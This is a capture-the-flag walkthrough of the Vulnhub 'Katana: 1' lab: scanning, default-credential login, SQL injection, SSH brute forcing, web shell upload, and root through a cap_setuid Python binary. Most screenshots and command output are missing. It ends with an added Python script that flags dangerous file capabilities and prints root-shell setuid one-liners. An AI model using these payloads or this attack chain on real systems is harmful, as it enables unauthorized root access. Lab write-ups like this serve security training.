Vulnhub Katana: 1 Walkthrough

    This box is described as "Intermediate" and the description states:  "Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root)."

    I'll admit, I'm getting a little worn out on the multiple web servers sitting on troll ports.  It's basically the same box recycled with a different twist.  That being said, the privilege escalation was excellent.  There are multiple ways in to a low-privilege shell and I cover two. 

    We kick off with Nmap:

    Lots of open ports, like the previous boxes from this author.  When we scan port 80 with Nikto, we find:

    When we access it from the web browser, we find:

    Scrolling down, we find:

    Moving over to the admin page, we try admin / admin:

    We're in!  I attempt to upload a shell:

    But that errors out.  When I look at the URL in the address bar, I see a parameter that could be vulnerable to SQL injection:

    Mind you, this is a detour and it goes nowhere, but if you want to play around with it, this is how it starts:

    We capture the POST request in Burp, save it to a file and feed that file to SQLMap:

    We find a database:

    Let's enumerate the database:

    We find a table and we get the column info:

    Let's dump the table:

    Cracking the hash confirms what we already know: the username is admin and the password is admin.

    Circling back: looking at the naming pattern of the pages, I guess that admin_edit.php might exist:

    I attempt to upload a shell:

    When I try to add it:

    We get an error. 

    Meanwhile, I'm brute forcing SSH and I find:

    That's our first way in; I'm not sure it was intended.  We SSH over to the box:

    As I'm hunting around the various web servers, I find:

    I think this was probably the intended entry:

    We upload our shell:

    Note the path of the uploaded file, but recognize that it is NOT served by this web server; the upload handler writes into the document root of the server running on port 8715, so that is where we have to request it:

    With our handler set up:

    Getting in as www-data buys us nothing more.  Back to katana, I search for files with capabilities set and uncover:

    Which leads us to:

    The capability set on the Python 2.7 binary lets it switch to uid 0, so we use it to spawn a root shell.  We get the flag and it's game over!  I really like the privilege escalation, that was solid.  It took me a bit to figure out because it doesn't show up in privilege escalation scripts, or at least not in those I ran.
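    Because the capability did not show up in the enumeration scripts I ran, here is a small triage script for `getcap -r / 2>/dev/null` output.  This is an added example, not something from the box or from any privilege escalation tool: it parses the libcap text format (both the older `/path = caps` layout and the newer `/path caps` layout), flags binaries whose effective set contains a capability that commonly yields root, and for interpreters with cap_setuid emits the one-liner used above.  The sample getcap lines are constructed; that Python 2.7 carries `cap_setuid+ep` is an assumption consistent with the walkthrough, not a value copied from the box.

```python
"""Triage getcap output for capability-based privilege escalation.

Added example, not code from the walkthrough.  SAMPLE_GETCAP is constructed;
the cap_setuid+ep entry for python2.7 is an assumption consistent with the
root shell obtained in the walkthrough.
"""
import re

# Capabilities that, when effective on an interpreter or a binary that runs
# attacker-controlled code, usually translate directly into root.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner",
}

# One-liners that turn cap_setuid into a root shell.  The python form is the
# one used in the walkthrough; the perl form is the equivalent payload for
# that interpreter (assumed to be present on the target if flagged).
SETUID_PAYLOADS = {
    "python": "{bin} -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'",
    "perl": "{bin} -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'",
}

# Constructed sample of `getcap -r / 2>/dev/null` (older libcap layout).
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# One libcap clause: comma-separated cap names, an operator, then flags e/i/p.
_CLAUSE = re.compile(r"^([a-z_0-9,]+)([=+-])([eip]*)$")


def parse_captext(captext):
    """Turn 'cap_net_admin,cap_net_raw+ep' or 'cap_setuid=ep' into
    {cap_name: set_of_flags}.  Clauses are space-separated; '=' and '+'
    grant the listed flags, '-' removes them."""
    caps = {}
    for clause in captext.split():
        m = _CLAUSE.match(clause)
        if not m:
            raise ValueError("unrecognised capability clause: %r" % clause)
        names, op, flags = m.groups()
        for name in names.split(","):
            current = caps.setdefault(name, set())
            if op == "-":
                current -= set(flags)
            else:
                current |= set(flags)
    return caps


def parse_getcap(output):
    """Parse getcap output into a list of (path, caps) tuples.  Handles the
    older '/path = caps' layout and the newer '/path caps' layout."""
    entries = []
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            path, captext = line.split(" = ", 1)
        else:
            path, captext = line.split(None, 1)
        entries.append((path, parse_captext(captext)))
    return entries


def find_escalations(entries):
    """Return binaries whose *effective* set holds a dangerous capability.
    A capability that is only permitted ('+p') is not flagged: a program
    that is not capability-aware never raises it into its effective set."""
    hits = []
    for path, caps in entries:
        effective = sorted(
            c for c, f in caps.items() if c in DANGEROUS_CAPS and "e" in f
        )
        if not effective:
            continue
        payload = None
        base = path.rsplit("/", 1)[-1]
        for interp, template in SETUID_PAYLOADS.items():
            if base.startswith(interp) and "cap_setuid" in effective:
                payload = template.format(bin=path)
        hits.append({"path": path, "caps": effective, "payload": payload})
    return hits


if __name__ == "__main__":
    for hit in find_escalations(parse_getcap(SAMPLE_GETCAP)):
        print("%s  %s" % (hit["path"], ",".join(hit["caps"])))
        if hit["payload"]:
            print("    " + hit["payload"])
```

    On a live box, pipe the real output in: `getcap -r / 2>/dev/null | python3 capcheck.py` after swapping SAMPLE_GETCAP for `sys.stdin.read()`.  ping's cap_net_raw and the gstreamer helper's network capabilities are correctly ignored; only the interpreter that can change its uid is reported.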

    © 2020